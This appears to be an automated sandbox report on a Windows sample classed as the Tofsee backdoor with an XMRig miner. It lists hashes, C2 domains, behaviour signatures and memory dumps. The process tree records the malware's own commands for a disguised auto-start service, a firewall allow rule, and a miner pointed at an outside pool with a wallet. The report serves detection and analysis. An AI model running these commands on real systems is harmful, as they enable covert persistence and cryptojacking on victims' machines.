Overview

overview

10

Static

static

3

bd4e836191...7c.exe

windows7-x64

10

bd4e836191...7c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 10:18

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c.exe

  • Size

    283KB

  • MD5

    d50cc359381325522385b32fb37aa695

  • SHA1

    f63ee5b87cea7e2385b7800c0f5728960546de70

  • SHA256

    bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c

  • SHA512

    2c106b342402668158e9e55495929ffb99ee00cf1063f3dcb538880aa967b70a123a5603dfb92d82d71842eb4b7e2cc4bc268e49c97473a8924c91b474cce220

  • SSDEEP

    3072:1aHQFccmfkw9dCj/fkjFYmGX6jAAVfcezSepGt1U1wdwSDr9:YHQFDms8dCb8jSmSWVfcez5AdwK

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 7 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c.exe
    "C:\Users\Admin\AppData\Local\Temp\bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wgrzidir\
      2⤵
        PID:2992
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rgyfkinf.exe" C:\Windows\SysWOW64\wgrzidir\
        2⤵
          PID:1336
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create wgrzidir binPath= "C:\Windows\SysWOW64\wgrzidir\rgyfkinf.exe /d\"C:\Users\Admin\AppData\Local\Temp\bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1944
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description wgrzidir "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2636
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start wgrzidir
          2⤵
          • Launches sc.exe
          PID:2768
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2772
      • C:\Windows\SysWOW64\wgrzidir\rgyfkinf.exe
        C:\Windows\SysWOW64\wgrzidir\rgyfkinf.exe /d"C:\Users\Admin\AppData\Local\Temp\bd4e8361911dabb59f382e52e26614bbe08c0f60da5cfbaa412a8b9e2423587c.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2752

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\rgyfkinf.exe
              Filesize

              13.0MB

              MD5

              a5d23815840b300aed779fddd885cbe4

              SHA1

              3508c6a562cef7e4ccc04993839d51d5b944618c

              SHA256

              90ff6aa9b86a8c6cbb107595db8084fa5db3c729f6e7284511070c7a7d5dc36b

              SHA512

              9f740c00ea5cc9e06693022f19c6c9ceb6a71306052e19ac9eb885322269ef96bd97cd1eec860dc6931ad7de938dd38bc4b56143e4b1517e3d3856c50d150fe9

              Download Submit

            • C:\Windows\SysWOW64\wgrzidir\rgyfkinf.exe
              Filesize

              13.0MB

              MD5

              a5d23815840b300aed779fddd885cbe4

              SHA1

              3508c6a562cef7e4ccc04993839d51d5b944618c

              SHA256

              90ff6aa9b86a8c6cbb107595db8084fa5db3c729f6e7284511070c7a7d5dc36b

              SHA512

              9f740c00ea5cc9e06693022f19c6c9ceb6a71306052e19ac9eb885322269ef96bd97cd1eec860dc6931ad7de938dd38bc4b56143e4b1517e3d3856c50d150fe9

              Download Submit

            • memory/1984-16-0x0000000000400000-0x0000000002599000-memory.dmp

              Filesize

              33.6MB

              Download

            • memory/1984-13-0x0000000000400000-0x0000000002599000-memory.dmp

              Filesize

              33.6MB

              Download

            • memory/1984-10-0x0000000000270000-0x0000000000370000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2108-6-0x0000000000400000-0x0000000002599000-memory.dmp

              Filesize

              33.6MB

              Download

            • memory/2108-7-0x0000000000220000-0x0000000000233000-memory.dmp

              Filesize

              76KB

              Download

            • memory/2108-1-0x0000000002720000-0x0000000002820000-memory.dmp

              Filesize

              1024KB

              Download

            • memory/2108-4-0x0000000000400000-0x0000000002599000-memory.dmp

              Filesize

              33.6MB

              Download

            • memory/2108-2-0x0000000000220000-0x0000000000233000-memory.dmp

              Filesize

              76KB

              Download

            • memory/2752-78-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-77-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-76-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-75-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-73-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-74-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-65-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/2752-63-0x0000000000190000-0x0000000000281000-memory.dmp

              Filesize

              964KB

              Download

            • memory/3016-38-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-47-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-34-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-35-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-36-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-37-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-28-0x0000000000110000-0x0000000000116000-memory.dmp

              Filesize

              24KB

              Download

            • memory/3016-39-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-42-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-41-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-40-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-43-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-44-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-45-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-46-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-31-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-48-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-49-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-50-0x0000000000120000-0x0000000000130000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3016-51-0x0000000000190000-0x0000000000195000-memory.dmp

              Filesize

              20KB

              Download

            • memory/3016-55-0x0000000005720000-0x0000000005B2B000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/3016-54-0x0000000000190000-0x0000000000195000-memory.dmp

              Filesize

              20KB

              Download

            • memory/3016-58-0x0000000005720000-0x0000000005B2B000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/3016-59-0x00000000001E0000-0x00000000001E7000-memory.dmp

              Filesize

              28KB

              Download

            • memory/3016-27-0x0000000001960000-0x0000000001B6F000-memory.dmp

              Filesize

              2.1MB

              Download

            • memory/3016-24-0x0000000001960000-0x0000000001B6F000-memory.dmp

              Filesize

              2.1MB

              Download

            • memory/3016-23-0x0000000000080000-0x0000000000095000-memory.dmp

              Filesize

              84KB

              Download

            • memory/3016-21-0x0000000000080000-0x0000000000095000-memory.dmp

              Filesize

              84KB

              Download

            • memory/3016-20-0x0000000000080000-0x0000000000095000-memory.dmp

              Filesize

              84KB

              Download

            • memory/3016-15-0x0000000000080000-0x0000000000095000-memory.dmp

              Filesize

              84KB

              Download

            • memory/3016-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3016-11-0x0000000000080000-0x0000000000095000-memory.dmp

              Filesize

              84KB

              Download